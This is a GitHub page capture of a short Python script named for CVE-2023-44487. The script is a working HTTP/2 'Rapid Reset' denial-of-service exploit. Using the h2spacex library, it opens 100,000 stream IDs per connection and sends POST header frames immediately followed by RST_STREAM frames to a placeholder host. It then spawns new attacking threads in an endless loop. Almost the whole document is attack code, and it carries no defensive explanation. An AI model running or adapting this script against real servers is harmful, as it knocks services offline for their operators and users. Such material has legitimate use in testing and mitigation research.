-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcve-2023-44487-example2.py
52 lines (39 loc) · 1.57 KB
/
cve-2023-44487-example2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from h2spacex import H2OnTlsConnection
from h2spacex import h2_frames
from threading import Thread
headers = """accept: */*
accept-encoding: deflate, gzip, br
"""
body = """DATA..."""
def start_sending_request_to_h2_conn(h2_connection):
h2_connection.setup_connection()
stream_ids_list = h2_connection.generate_stream_ids(number_of_streams=100000)
for s_id in stream_ids_list:
header_frames_without_last_byte, _ = h2_connection.create_single_packet_http2_post_request_frames(
method='POST',
headers_string=headers,
scheme='https',
stream_id=s_id,
authority="abc.example.com",
body=body,
path='/post?id=SOMETHING'
)
reset_stream_frame = h2_frames.create_reset_stream_frame(stream_id=s_id, error_code=0)
h2_connection.send_frames(header_frames_without_last_byte)
h2_connection.send_frames(reset_stream_frame)
# parse response frames
resp = h2_connection.read_response_from_socket(_timeout=3)
frame_parser = h2_frames.FrameParser(h2_connection=h2_connection)
frame_parser.add_frames(resp)
frame_parser.show_response_of_sent_requests()
h2_connection.close_connection()
del h2_connection
def create_new_h2_conn_object():
_h2_conn = H2OnTlsConnection(
hostname='abc.example.com',
port_number=443
)
return _h2_conn
while True:
_temp_h2_conn = create_new_h2_conn_object()
Thread(target=start_sending_request_to_h2_conn, args=(_temp_h2_conn,)).start()